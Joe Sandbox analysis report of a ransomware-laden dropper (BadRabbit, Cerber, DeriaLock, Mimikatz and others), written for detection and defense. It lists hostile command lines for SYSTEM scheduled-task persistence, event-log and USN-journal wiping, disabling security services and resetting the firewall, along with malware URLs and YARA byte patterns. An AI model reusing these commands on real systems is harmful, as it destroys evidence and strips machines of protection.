Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
07bb0738.exe

Overview

General Information

Sample Name:07bb0738.exe
Analysis ID:712625
MD5:e8583ee36603531bcf5001346c7474a7
SHA1:4a740bc0de76cf7597d001f5cb659b220de6dccd
SHA256:792b258b63cc60abacdcc9218b04152805081b3cf8d11de875969c7f07bb0738
Tags:exeNabucurRansomware
Infos:

Detection

Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected DeriaLock Ransomware
Yara detected Babuk Ransomware
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Antivirus / Scanner detection for submitted sample
Yara detected Mimikatz
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected InfinityLock Ransomware
Creates multiple autostart registry keys
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Deletes keys related to Windows Defender
PE file has a writeable .text section
Deletes keys which are related to windows safe boot (disables safe mode boot)
Connects to many ports of the same IP (likely port scanning)
Clears the journal log
Machine Learning detection for sample
Clears the windows event log
Writes many files with high entropy
Connects to many different private IPs (likely to spread or exploit)
Disables security and backup related services
Tries to detect virtualization through RDTSC time measurements
Disables the windows security center
Disables the Windows registry editor (regedit)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to create processes via WMI
Opens network shares
Disables Windows system restore
Changes security center settings (notifications, updates, antivirus, firewall)
Disables the Windows task manager (taskmgr)
PE file has nameless sections
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the windows firewall
Connects to many different private IPs via SMB (likely to spread or exploit)
Antivirus or Machine Learning detection for unpacked file
Deletes Internet Explorer cookies via registry
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Changes the start page of internet explorer
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Changes the window title of internet explorer
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses net.exe to stop services
PE file contains an invalid checksum
File is packed with WinRar
Detected TCP or UDP traffic on non-standard ports
Uses taskkill to terminate processes
Found evaded block containing many API calls
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)

Classification

  • System is w10x64
  • 07bb0738.exe (PID: 244 cmdline: "C:\Users\user\Desktop\07bb0738.exe" MD5: E8583EE36603531BCF5001346C7474A7)
    • 07bb0738.exe (PID: 3076 cmdline: "C:\Users\user\Desktop\07bb0738.exe" MD5: E8583EE36603531BCF5001346C7474A7)
    • Endermanch@Antivirus.exe (PID: 1916 cmdline: "C:\Users\user\Desktop\Endermanch@Antivirus.exe" MD5: C7E9746B1B039B8BD1106BCA3038C38F)
      • net.exe (PID: 6432 cmdline: net stop wscsvc MD5: DD0561156F62BC1958CE0E370B23711B)
    • Endermanch@AntivirusPlatinum.exe (PID: 2576 cmdline: "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" MD5: 382430DD7EAE8945921B7FEAB37ED36B)
      • 302746537.exe (PID: 968 cmdline: "C:\WINDOWS\302746537.exe" MD5: 8703FF2E53C6FD3BC91294EF9204BACA)
        • cmd.exe (PID: 5548 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\A00.tmp\302746537.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • regsvr32.exe (PID: 5956 cmdline: regsvr32 /s c:\windows\comctl32.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
          • regsvr32.exe (PID: 5156 cmdline: regsvr32 /s c:\windows\mscomctl.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
          • antivirus-platinum.exe (PID: 2796 cmdline: c:\windows\antivirus-platinum.exe MD5: CD1800322CCFC425014A8394B01A4B3D)
          • attrib.exe (PID: 5320 cmdline: attrib +h c:\windows\antivirus-platinum.exe MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
    • Endermanch@AnViPC2009.exe (PID: 4900 cmdline: "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" MD5: 910DD666C83EFD3496F21F9F211CDC1F)
      • avpc2009.exe (PID: 5756 cmdline: "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe" MD5: C18A7323332B3292A8E0F1C81DF65698)
    • Endermanch@BadRabbit.exe (PID: 5468 cmdline: "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 4644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 4124 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 5136 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 3388 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 1832 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 2424 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit" MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 4328 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00 MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 4244 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • 586F.tmp (PID: 3672 cmdline: "C:\Windows\586F.tmp" \\.\pipe\{9D54B529-EEEC-45A5-9DC8-4D8B7F723465} MD5: 347AC3B6B791054DE3E5720A7144A977)
          • conhost.exe (PID: 4240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5936 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • Endermanch@Birele.exe (PID: 3424 cmdline: "C:\Users\user\Desktop\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 5768 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Cerber5.exe (PID: 3128 cmdline: "C:\Users\user\Desktop\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)
      • netsh.exe (PID: 3460 cmdline: C:\Windows\system32\netsh.exe advfirewall set allprofiles state on MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 4024 cmdline: C:\Windows\system32\netsh.exe advfirewall reset MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
    • Endermanch@DeriaLock.exe (PID: 2584 cmdline: "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)
    • Endermanch@FakeAdwCleaner.exe (PID: 3332 cmdline: "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" MD5: 248AADD395FFA7FFB1670392A9398454)
      • 6AdwCleaner.exe (PID: 3528 cmdline: "C:\Users\user\AppData\Local\6AdwCleaner.exe" MD5: 87E4959FEFEC297EBBF42DE79B5C88F6)
    • Endermanch@InfinityCrypt.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" MD5: B805DB8F6A84475EF76B795B0D1ED6AE)
  • svchost.exe (PID: 5240 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5308 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3880 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5384 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5072 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 2224 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3924 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3044 cmdline: c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4020 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4708 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4024 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cmd.exe (PID: 5464 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2277809790 && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
    C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeMALWARE_Win_InfinityLockDetects InfinityLock ransomwareditekSHen
    • 0x2c145:$s3: GenerateHWID
    • 0x2c2c3:$s4: CreateKey
    • 0x2c1b6:$d1: ProgrammFiles
    • 0x2c1ad:$d2: OneDrive
    • 0x2c184:$d3: ProgrammsX86
    • 0x2c1a4:$d4: UserDirs
    • 0x2c1dd:$d5: B_Drive
    • 0x2e834:$pdb1: F:\DESKTOP!\ChkDsk\ChkDsk\obj\
    • 0x2e846:$pdb2: \ChkDsk\obj\Debug\PremiereCrack.pdb
    C:\Users\user\Desktop\Endermanch@Cerber5.execerber3Cerber3 pekeinfo
    • 0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
    C:\Windows\dispci.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
    • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST
    • 0x14430:$x4: C:\Windows\cscc.dat
    • 0x1b1bd:$s1: need to do is submit the payment and get the decryption password.
    • 0x1f30d:$s1: need to do is submit the payment and get the decryption password.
    • 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
    • 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot
    • 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot
    • 0x146ca:$s6: Files decryption completed
    • 0x145ea:$s7: Disable your anti-virus and anti-malware programs
    C:\Windows\dispci.exesig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
    • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
    • 0x1b1bd:$x2: need to do is submit the payment and get the decryption password.
    • 0x1f30d:$x2: need to do is submit the payment and get the decryption password.
    • 0x1b40a:$s3: If you have already got the password, please enter it below.
    • 0x1f55a:$s3: If you have already got the password, please enter it below.
    • 0x2130c:$s4: dispci.exe
    • 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
    • 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot
    • 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot
    • 0x147b8:$s7: Enter password#1:
    • 0x14676:$s8: Enter password#2:
    • 0x14430:$s9: C:\Windows\cscc.dat
    • 0x14940:$s10: schtasks /Delete /F /TN %ws
    • 0x1b448:$s11: Password#1:
    • 0x1f598:$s11: Password#1:
    • 0x14398:$s12: \AppData
    • 0x14650:$s13: Readme.txt
    • 0x14752:$s14: Disk decryption completed
    • 0x146ca:$s15: Files decryption completed
    • 0x212b4:$s16: http://diskcryptor.net/
    • 0x1b235:$s17: Your personal installation key#1:
    Click to see the 11 entries
    SourceRuleDescriptionAuthorStrings
    0000002F.00000000.420217130.00007FF769B1E000.00000008.00000001.01000000.0000001D.sdmpmimikatzmimikatzBenjamin DELPY (gentilkiwi)
    • 0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
    • 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
    • 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
    00000017.00000000.387505023.0000000000448000.00000020.00000001.01000000.00000013.sdmpcerber3Cerber3 pekeinfo
    • 0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
    00000039.00000000.449968322.0000000000363000.00000002.00000001.01000000.00000026.sdmpJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
      0000002F.00000000.419388930.00007FF769B1E000.00000008.00000001.01000000.0000001D.sdmpmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      00000016.00000003.408744646.00000000045A1000.00000004.00000800.00020000.00000000.sdmpsig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
      • 0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
      • 0x1a205:$x2: need to do is submit the payment and get the decryption password.
      • 0x1e355:$x2: need to do is submit the payment and get the decryption password.
      • 0x1a452:$s3: If you have already got the password, please enter it below.
      • 0x1e5a2:$s3: If you have already got the password, please enter it below.
      • 0x20354:$s4: dispci.exe
      • 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
      • 0x1a587:$s6: Run DECRYPT app at your desktop after system boot
      • 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot
      • 0x13800:$s7: Enter password#1:
      • 0x136be:$s8: Enter password#2:
      • 0x13478:$s9: C:\Windows\cscc.dat
      • 0x13988:$s10: schtasks /Delete /F /TN %ws
      • 0x1a490:$s11: Password#1:
      • 0x1e5e0:$s11: Password#1:
      • 0x133e0:$s12: \AppData
      • 0x13698:$s13: Readme.txt
      • 0x1379a:$s14: Disk decryption completed
      • 0x13712:$s15: Files decryption completed
      • 0x202fc:$s16: http://diskcryptor.net/
      • 0x1a27d:$s17: Your personal installation key#1:
      Click to see the 12 entries
      SourceRuleDescriptionAuthorStrings
      23.0.Endermanch@Cerber5.exe.400000.1.unpackcerber3Cerber3 pekeinfo
      • 0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
      47.0.586F.tmp.7ff769b10000.2.unpackBadRabbit_Mimikatz_CompAuto-generated ruleFlorian Roth
      • 0xa848:$s1: %lS%lS%lS:%lS
      • 0xa440:$s2: lsasrv
      • 0xa868:$s3: CredentialKeys
      • 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
      47.0.586F.tmp.7ff769b10000.2.unpackmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0xcaa8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0xcab8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0xca68:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      47.0.586F.tmp.7ff769b10000.2.unpackJoeSecurity_Mimikatz_2Yara detected MimikatzJoe Security
        57.0.Endermanch@InfinityCrypt.exe.350000.0.unpackJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
          Click to see the 37 entries

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" , ParentImage: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, ParentProcessId: 5468, ParentProcessName: Endermanch@BadRabbit.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 4124, ProcessName: rundll32.exe
          Timestamp:192.168.2.393.107.12.45563968932023619 09/29/22-15:00:07.760760
          SID:2023619
          Source Port:55639
          Destination Port:6893
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3185.53.177.5349829802809804 09/29/22-15:00:22.831778
          SID:2809804
          Source Port:49829
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://searchdusty.com/avt/avt_dbmyAvira URL Cloud: Label: malware
          Source: http://searchdusty.com/Avira URL Cloud: Label: malware
          Source: http://searchdusty.com/avt/avt.datAvira URL Cloud: Label: malware
          Source: http://powertoolsforyou.com/themes/prestashop/cache/stats.phpAvira URL Cloud: Label: malware
          Source: http://searchdusty.com/avt/avt_dbAvira URL Cloud: Label: malware
          Source: http://searchdusty.com/avt/avt_dbst7Avira URL Cloud: Label: malware
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeAvira: detection malicious, Label: HEUR/AGEN.1224490
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeAvira: detection malicious, Label: HEUR/AGEN.1227089
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeAvira: detection malicious, Label: TR/Ransom.pfnaw
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeAvira: detection malicious, Label: TR/AD.FakeRean.mwfxa
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeAvira: detection malicious, Label: DR/Pasta.kdx
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeAvira: detection malicious, Label: TR/Dldr.FraudLoad.xerf
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeAvira: detection malicious, Label: DR/Agent.aq.122610
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeAvira: detection malicious, Label: TR/BAS.Samca.fyzpg
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeAvira: detection malicious, Label: TR/Genasom.wzara
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeAvira: detection malicious, Label: JOKE/Agent.rlham
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeAvira: detection malicious, Label: PUA/HappyAV.A
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeAvira: detection malicious, Label: TR/Diskcoder.ezxim
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeAvira: detection malicious, Label: TR/Fake.avpc.94312
          Source: 07bb0738.exeReversingLabs: Detection: 64%
          Source: 07bb0738.exeVirustotal: Detection: 62%Perma Link
          Source: 07bb0738.exeMetadefender: Detection: 24%Perma Link
          Source: 07bb0738.exeAvira: detected
          Source: http://searchdusty.com/avt/avt.datVirustotal: Detection: 5%Perma Link
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeReversingLabs: Detection: 62%
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeMetadefender: Detection: 56%Perma Link
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeMetadefender: Detection: 52%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeReversingLabs: Detection: 67%
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeMetadefender: Detection: 24%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeReversingLabs: Detection: 77%
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeMetadefender: Detection: 28%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeMetadefender: Detection: 64%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeMetadefender: Detection: 82%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeMetadefender: Detection: 77%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeReversingLabs: Detection: 90%
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeMetadefender: Detection: 75%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeMetadefender: Detection: 68%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeMetadefender: Detection: 36%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeMetadefender: Detection: 64%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Krotten.exeReversingLabs: Detection: 96%
          Source: C:\Users\user\Desktop\Endermanch@Krotten.exeMetadefender: Detection: 86%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@LPS2019.exeReversingLabs: Detection: 58%
          Source: C:\Users\user\Desktop\Endermanch@LPS2019.exeMetadefender: Detection: 24%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeMetadefender: Detection: 80%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@NavaShield.exeReversingLabs: Detection: 51%
          Source: C:\Users\user\Desktop\Endermanch@NavaShield.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeReversingLabs: Detection: 90%
          Source: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeMetadefender: Detection: 72%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@PCDefender.exeReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\Endermanch@PCDefender.exeMetadefender: Detection: 28%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exeReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exeMetadefender: Detection: 84%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@PolyRansom.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@PolyRansom.exeMetadefender: Detection: 81%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeReversingLabs: Detection: 35%
          Source: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SE2011.exeReversingLabs: Detection: 93%
          Source: C:\Users\user\Desktop\Endermanch@SE2011.exeMetadefender: Detection: 64%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeReversingLabs: Detection: 87%
          Source: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeMetadefender: Detection: 80%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeReversingLabs: Detection: 81%
          Source: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeMetadefender: Detection: 56%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeMetadefender: Detection: 56%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeReversingLabs: Detection: 81%
          Source: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeMetadefender: Detection: 72%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeMetadefender: Detection: 72%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@VAV2008.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\Endermanch@VAV2008.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@ViraLock.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@ViraLock.exeMetadefender: Detection: 82%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeMetadefender: Detection: 88%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeReversingLabs: Detection: 45%
